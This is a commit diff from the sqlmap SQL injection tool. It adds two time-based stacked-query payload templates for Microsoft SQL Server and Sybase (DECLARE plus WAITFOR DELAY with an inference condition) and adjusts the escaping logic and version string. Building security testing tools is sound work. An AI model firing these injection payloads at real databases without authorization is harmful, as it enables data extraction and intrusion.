Implements #3780

2025-11-04 01:47:37 +03:00 · 2019-06-26 15:53:18 +02:00 · 2019-06-26 15:53:18 +02:00 · cb170f1f28
commit cb170f1f28
parent 5650e1a1a4
3 changed files with 46 additions and 3 deletions
--- a/data/xml/payloads/stacked_queries.xml
+++ b/data/xml/payloads/stacked_queries.xml
@ -268,6 +268,28 @@
        </details>
    </test>
    <test>
        <title>Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)</title>
        <stype>4</stype>
        <level>2</level>
        <risk>1</risk>
        <clause>1-8</clause>
        <where>1</where>
        <vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
        <request>
            <payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
            <os>Windows</os>
        </details>
    </test>
    <test>
        <title>Microsoft SQL Server/Sybase stacked queries</title>
        <stype>4</stype>
@ -289,6 +311,27 @@
        </details>
    </test>
    <test>
        <title>Microsoft SQL Server/Sybase stacked queries (DECLARE)</title>
        <stype>4</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>1-8</clause>
        <where>1</where>
        <vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
        <request>
            <payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
            <os>Windows</os>
        </details>
    </test>
    <test>
        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)</title>
        <stype>4</stype>
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@ -18,7 +18,7 @@ from lib.core.enums import OS
 from thirdparty.six import unichr as _unichr
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.3.6.53"
+VERSION = "1.3.6.54"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@ -420,7 +420,7 @@ MIN_ERROR_CHUNK_LENGTH = 8
 MAX_ERROR_CHUNK_LENGTH = 1024
 # Do not escape the injected statement if it contains any of the following SQL keywords
-EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK)
+EXCLUDE_UNESCAPE = ("WAITFOR DELAY '", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK)
 # Mark used for replacement of reflected values
 REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"
--- a/plugins/generic/syntax.py
+++ b/plugins/generic/syntax.py
@ -26,7 +26,7 @@ class Syntax(object):
        if quote:
            for item in re.findall(r"'[^']*'+", expression):
                original = item[1:-1]
-                if original:
+                if original and re.search(r"\[(SLEEPTIME|RAND)", original) is None:  # e.g. '[SLEEPTIME]' marker
                    replacement = escaper(original) if not conf.noEscape else original
                    if replacement != original: